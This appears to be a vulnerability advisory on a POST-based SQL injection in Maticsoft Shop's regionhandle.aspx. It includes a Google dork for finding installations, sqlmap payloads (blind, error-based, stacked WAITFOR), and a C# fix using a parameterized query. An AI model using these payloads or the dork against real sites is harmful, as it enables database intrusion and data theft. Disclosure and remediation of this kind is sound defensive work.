Maticsoft Shop (动软商城系统) regionhandle.aspx ParentId parameter SQL injection vulnerability

2016-01-20T00:00:00
ID SSV:90542
Type seebug
Reporter kikay
Modified 2016-01-20T00:00:00

Description

Maticsoft Shop (动软商城系统) is an e-commerce marketing solution that combines a CMS news portal, a standalone online shop, a WeChat shop, a mobile app and an SNS user community. It is aimed at helping businesses build a brand image and run their own online promotion, making full use of site SEO, Weibo, apps, WeChat and other mobile-client marketing channels to set up a new sales channel.

Official homepage: http://www.maticsoft.com/

Google Dork: MaticsoftFK

0x02 Vulnerability details

Generic injection

The ParentId parameter of the page http://shop1.maticsoft.cn/regionhandle.aspx is not strictly filtered, resulting in a POST-based SQL injection.

sqlmap output:

```
Place: POST
Parameter: ParentId

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Action=GetChildNode&ParentId=214 AND 2697=2697
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Action=GetChildNode&ParentId=214 AND 7244=CONVERT(INT,(CHAR(58)+CHAR(104)+CHAR(102)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (7244=7244) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(120)+CHAR(114)+CHAR(121)+CHAR(58)))
Vector: AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Action=GetChildNode&ParentId=214; WAITFOR DELAY '0:0:5';--
Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Action=GetChildNode&ParentId=214 WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
```

Example:

0x03 Remediation

1. Filter the ParentId parameter in regionhandle.aspx

2. Use a protective product such as Jiasule (加速乐)
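As an added illustration of fix 1 (this is example code, not Maticsoft's own source, and the handler shape, connection-string name "Shop" and the table and column names Region, RegionId, Name and ParentId are assumptions): the GetChildNode action rejects any ParentId that is not a non-negative integer and binds it as a typed SQL parameter, so the boolean, error-based, stacked and time-based payloads above can no longer become part of the statement.

```csharp
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.Script.Serialization;

// Hardened replacement for the region lookup handler (assumed shape).
public class RegionHandle : IHttpHandler
{
    // The weak pattern the report describes looks like this: the POSTed value is
    // concatenated into the SQL text, so "214 AND 2697=2697" or
    // "214; WAITFOR DELAY '0:0:5'" is executed as SQL.
    //   string sql = "SELECT RegionId, Name FROM Region WHERE ParentId=" + parentIdText;

    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "application/json";
        if (context.Request.Form["Action"] != "GetChildNode")
        {
            context.Response.StatusCode = 400;
            return;
        }

        // 1. Enforce the type: ParentId must parse as a non-negative integer.
        //    Every payload listed in the report fails this check.
        int parentId;
        if (!int.TryParse(context.Request.Form["ParentId"], out parentId) || parentId < 0)
        {
            context.Response.StatusCode = 400;
            context.Response.Write("{\"error\":\"invalid ParentId\"}");
            return;
        }

        // 2. Bind the value as an INT parameter; the query text is constant.
        string connString = ConfigurationManager.ConnectionStrings["Shop"].ConnectionString;
        var rows = new List<Dictionary<string, object>>();
        using (var conn = new SqlConnection(connString))
        using (var cmd = new SqlCommand(
            "SELECT RegionId, Name FROM Region WHERE ParentId = @ParentId", conn))
        {
            cmd.Parameters.Add("@ParentId", SqlDbType.Int).Value = parentId;
            conn.Open();
            using (SqlDataReader r = cmd.ExecuteReader())
                while (r.Read())
                    rows.Add(new Dictionary<string, object> { { "id", r.GetInt32(0) }, { "name", r.GetString(1) } });
        }
        context.Response.Write(new JavaScriptSerializer().Serialize(rows));
    }

    public bool IsReusable { get { return false; } }
}
```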